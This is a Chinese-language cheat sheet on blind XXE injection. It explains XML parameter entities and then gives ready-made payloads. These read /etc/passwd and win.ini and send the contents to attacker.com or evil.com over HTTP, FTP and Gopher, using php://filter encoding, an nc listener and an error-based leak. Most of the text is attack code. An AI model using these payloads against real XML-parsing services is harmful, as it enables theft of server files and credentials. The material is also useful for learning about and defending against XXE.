【注入】xml盲注

OOB（Out-Of-Band）：外带数据
多数情况下，能直接返回目标内容的攻击场景很少，因此需要一些技巧
来获取我们想要的数据。
• 参数实体（Parameter Entity）：
如果说实体是XML节点中引用的内容，那么参数实体就是实体中引
用的内容。
<!ENTITY % name "foo">
<!ENTITY copyright "copyright © 2008, %name;.cn, ALL Right Reserved
">
1）参数实体只能在DTD声明中使用。
2）参数实体中不能再引用参数实体。

<!--http带外通信-->
<!--evil.xml-->
<?xml version="1.0"?>
<!DOCTYPE root[
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % dtd SYSTEM "http://attacker.com/ext.dtd">
    %dtd;
    %send;
]>
<zabbix_export></zabbix_export>
<!--ext.dtd-->
<!--嵌套参数实体的‘%’需要其十进制或16进制编码格式即%或%-->
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://attacker.com/?%file;'>">%all;

PHP环境下可以使用php://filter：
php://filter/read=convert.base64-encode/resource=/etc/hosts
利用FTP协议外带数据
两者相结合

<!--evil.xml-->
<?xml version="1.0"?>
<!DOCTYPE a[
<!ENTITY % asd SYSTEM "http://attacker.com/evt.dtd">
%asd;
%c;
%rrr;
]>
<a></a>
<!--ext.dtd-->
<!ENTITY % b SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % c "<!ENTITY % rrr SYSTEM 'ftp://evil.com:8000/%b'>">

Gopher：古老的信息查找协议 【Java1.6】
格式：gopher://{host}:{port}/{type}{request}
• type：为一位整型数字
• request：任意要发送的请求内容，使用URL格式编码。

在服务器中使用NC监听指定端口：
nc –lnp 1337

<?xml version="1.0"?>
<!DOCTYPE a[
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evt.dtd">
%dtd;
]>
<a></a>
<!--ext.dtd-->
<!ENTITY % all "<!ENTITY % rrr SYSTEM 'gopher://ip:8080/1%file'>">%all;

无效文件名构造主动报错
evil.xml

<?xml version="1.0"?>
<!DOCTYPE a[
<!ENTITY % one SYSTEM "http://attacker.com/ext.dtd">
%one;
%two;
%four;
]>
<!--ext.dtd-->
<!ENTITY % three SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % two SYSTEM "<!ENTITY % four SYSTEM 'file:///%three'>">

资料来源：5-XML实体攻击：从内网探测到命令执行步步惊心-张天琪.pdf